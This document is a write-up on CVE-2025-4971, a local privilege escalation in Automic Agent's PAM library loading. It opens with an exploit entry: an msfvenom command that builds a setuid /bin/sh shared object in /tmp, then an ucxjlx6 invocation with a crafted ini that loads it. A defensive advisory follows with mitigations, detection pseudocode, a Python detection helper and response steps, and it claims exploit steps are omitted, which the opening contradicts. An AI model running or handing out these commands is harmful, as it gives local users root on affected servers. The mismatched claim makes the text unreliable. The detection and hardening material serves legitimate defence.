Automic Agent 24.3.0 HF4 - Privilege Escalation
# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971
1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")

Automic Agent 24.3.0 HF4 / 21.0.13 HF1 — Privilege Escalation (CVE-2025-4971)
This article examines CVE-2025-4971, a local privilege escalation vulnerability affecting older releases of the Automic (Broadcom) Agent software. It explains the root cause in conceptual terms, the likely impact for affected environments, recommended mitigations and detection strategies, and incident response guidance. Actionable exploit steps are intentionally omitted; the focus is defensive: identifying, mitigating and detecting abuse.
Summary
- Vulnerability: Local privilege escalation via unsafe dynamic PAM library selection in the Automic Agent binary.
- Affected versions: Automic Agent releases earlier than 24.3.0 HF4 and earlier than 21.0.13 HF1.
- Identifier: CVE-2025-4971 (disclosed 2025-05-26).
- Impact: Local attacker with ability to run or influence agent start-up can execute arbitrary code with agent privileges (which may be elevated), potentially resulting in full system compromise.
- Status: Vendor remediation released in the fixed releases cited above. Apply vendor hotfixes or upgrades immediately when possible.
Technical root cause (conceptual)
The vulnerability stems from the agent’s configuration handling and the way it integrates with the PAM (Pluggable Authentication Modules) subsystem. A privileged agent binary accepted a configuration value that controlled which PAM library to load. If that configuration could be crafted to point to an attacker-controlled shared object living in a writable location, the agent could load and execute code from that library in the agent’s privileged context.
At a high level the failure modes are:
- Accepting unsanitized configuration input that controls a native library path.
- Loading the specified library in a privileged process (e.g., a setuid/setgid or otherwise elevated agent) without validating ownership/permissions or restricting allowed library locations.
- Using writable temporary or untrusted directories for files that will be loaded by privileged code (for example, /tmp).
Why this is dangerous
- Any local user who can influence configuration or deposit files in a writable directory that the agent accepts can cause privileged code execution.
- Once arbitrary code runs as the agent owner (often root or an account with elevated rights), the attacker can escalate to full system compromise, steal credentials, or move laterally.
Vendor fixes and patch guidance
- Vendor-released fixes are included in Automic Agent 24.3.0 HF4 and 21.0.13 HF1. Upgrade to the patched releases as the primary remediation.
- If immediate patching is not feasible, consider the mitigation options below to reduce exposure until an update is applied.
Recommended mitigations (prioritized)
- Patch immediately: Upgrade to the vendor-supplied fixed builds (24.3.0 HF4 or 21.0.13 HF1 or later).
- Restrict writable locations: Ensure temporary and runtime directories (e.g., /tmp, /var/tmp) are mounted with appropriate options (noexec where possible) and have strict permissions to prevent untrusted library placement.
- Reduce privileges: Run agent processes as unprivileged, dedicated accounts without unnecessary setuid/setgid bits. Remove setuid from binaries that do not require it.
- Harden configuration handling: Prevent use of configuration sources that can be influenced by unprivileged users. Avoid allowing arbitrary paths for native libraries in configuration files.
- Use MAC: Enforce Mandatory Access Control (SELinux/AppArmor) policies that restrict which libraries the agent can load and which files it may execute.
- File integrity monitoring: Monitor for the creation of unexpected .so files in writable directories and for modifications to agent binaries and configs.
- Network isolation: Limit agent startup and management to protected administrative networks and hosts to reduce the set of users who can trigger or influence the agent process.
Detection strategies and indicators of compromise (IoCs)
Detection should focus on the indicators that would accompany attempts to exploit this class of vulnerability (library drops in writable locations, unexpected library loads, suspicious agent invocations). Below are defensive detection concepts — not exploit instructions.
- Alert on creation of shared objects (.so) in world-writable locations (e.g., /tmp) by non-privileged users.
- Monitor the agent process startup arguments and configuration sources — unexpected config paths, use of process substitution, or configuration files referencing external/untrusted paths should be flagged.
- Log and alert on dynamic linker activity where a privileged process loads libraries from non-standard locations.
- Use audit logs to detect any execution of shells or escalation-related binaries immediately after agent startup.
```text
// Pseudocode detection rule (conceptual)
// Do not treat this as an executable script; adapt to your SIEM or EDR rules engine.
if process_name == "ucxjlx6" and config_contains_key("libName") and libName_path is in writable_location then
    alert("Potential unsafe PAM library reference in Automic Agent configuration")
end
```
Explanation: This pseudocode shows a high-level detection rule: alert when the Automic Agent starts (ucxjlx6 in this example) and its configuration includes a PAM library path that points to a writable/untrusted location. In practice, implement the logic in your SIEM/EDR with the actual process and config-parsing capabilities you have available.
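The conceptual rule above, carried through as runnable detection logic over a constructed agent configuration. This is an added example, not part of the advisory and not Automic/Broadcom code; the writable and trusted directory lists, the sample configs, the process-substitution check on the `ini=` argument and the helper names are all assumptions to adapt to your own environment.

```python
"""Detection helper for unsafe PAM library references at Automic Agent start-up."""
import configparser
import os
import re
from typing import List

# Assumption: directories an unprivileged local user can normally write to.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
# Assumption: locations where system PAM modules legitimately live.
TRUSTED_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# Constructed sample configs (the INI layout the agent accepts via ini=).
SUSPICIOUS_CONFIG = "[GLOBAL]\nhelplib = /dev/null\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/unexpected.so\n"
BENIGN_CONFIG = "[MISC]\nauthentication = PAM\n[PAM]\nlibName = /lib64/libpam.so.0\n"


def parse_agent_ini(text: str) -> configparser.ConfigParser:
    """Parse the agent's INI-style config, preserving key case (e.g. libName)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def classify_libname(path: str) -> str:
    """Return 'untrusted', 'trusted' or 'review' for a PAM library path."""
    norm = os.path.normpath(path)
    # A relative name is resolved through the dynamic linker search path, so treat it as untrusted.
    if not os.path.isabs(norm) or norm.startswith(WRITABLE_PREFIXES):
        return "untrusted"
    if norm.startswith(TRUSTED_PREFIXES):
        return "trusted"
    return "review"


def inspect_agent_start(process_name: str, cmdline: str, ini_text: str) -> List[str]:
    """Apply the rule: alert when ucxjlx6 starts with a PAM libName outside trusted locations."""
    findings: List[str] = []
    if process_name != "ucxjlx6":
        return findings
    # bash process substitution <(...) shows up as ini=/dev/fd/N on the command line.
    if re.search(r"\bini=/dev/fd/\d+", cmdline):
        findings.append("agent config supplied via process substitution")
    cp = parse_agent_ini(ini_text)
    if cp.get("MISC", "authentication", fallback="").upper() == "PAM":
        lib = cp.get("PAM", "libName", fallback="")
        verdict = classify_libname(lib) if lib else "review"
        if verdict != "trusted":
            findings.append(f"PAM libName {lib!r} is {verdict}")
    return findings


if __name__ == "__main__":
    print(inspect_agent_start("ucxjlx6", "./ucxjlx6 ini=/dev/fd/63", SUSPICIOUS_CONFIG))
```

Feed it the process name, command line and resolved configuration your EDR or audit pipeline already collects; an empty list means no finding.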
Forensic and incident response recommendations
- Isolate the host: Prevent further lateral movement by isolating impacted hosts from the network after an alert.
- Preserve evidence: Collect audit logs, process lists, open file descriptors, loaded modules, and memory snapshots for analysis before rebooting or changing state.
- Assess persistence: Look for malicious .so files, modified startup scripts, or cron/systemd changes installed after the agent execution time.
- Credential hygiene: Assume credentials accessible to the agent may be compromised; rotate service accounts and credentials used by the agent.
- Rebuild if necessary: If compromise is confirmed, rebuild hosts from known-good images after patching and strengthening protections.
Hardening checklist for Automic Agent deployments
| Area | Recommendation |
|---|---|
| Software Lifecycle | Keep Automic Agent and related components patched to vendor-supported versions; subscribe to vendor advisories. |
| Privileges | Run agents with the least privileges required; remove unnecessary setuid/setgid bits. |
| File permissions | Restrict write permissions on directories from which privileged processes load code; use noexec for temporary filesystems where practical. |
| Monitoring | Enable file integrity monitoring, audit logging for library loads and process starts, and alerting for suspicious changes. |
| Environment | Use containerization or hardened chroots and MAC to limit the blast radius of a compromised agent process. |
Responsible disclosure and exploit information
Vulnerability details were responsibly disclosed to the vendor prior to public announcements. The community and vendors publish proof-of-concept code only under controlled conditions for research; however, reproduction details and exploit commands are omitted here to avoid facilitating malicious use. Apply vendor-provided fixes and follow the mitigation guidance above.
Frequently Asked Questions (FAQ)
- Q: Can this be exploited remotely? A: The vulnerability is a local privilege escalation. Remote exploitation requires an initial ability to run code or influence configuration on the target host.
- Q: Is patching the only mitigation? A: Patching is the definitive fix. Interim mitigations (restricting writable locations, removing setuid bits, enforcing MAC policies) reduce the risk if patches cannot be deployed immediately.
- Q: How urgent is this? A: High — local privilege escalation in software commonly deployed on servers can enable full host compromise and lateral movement. Prioritize patching in exposed environments.
References and further reading
- Vendor product and security advisories (Broadcom / Automic): consult the vendor’s official support/security pages for the product and the published hotfix details.
- CVE-2025-4971 — vendor and CERT advisories for remediation steps and fixed release notes.
- General best practices for limiting dynamic library loading risks and for hardening privileged binaries (PAM hardening, file permissions, MAC policies).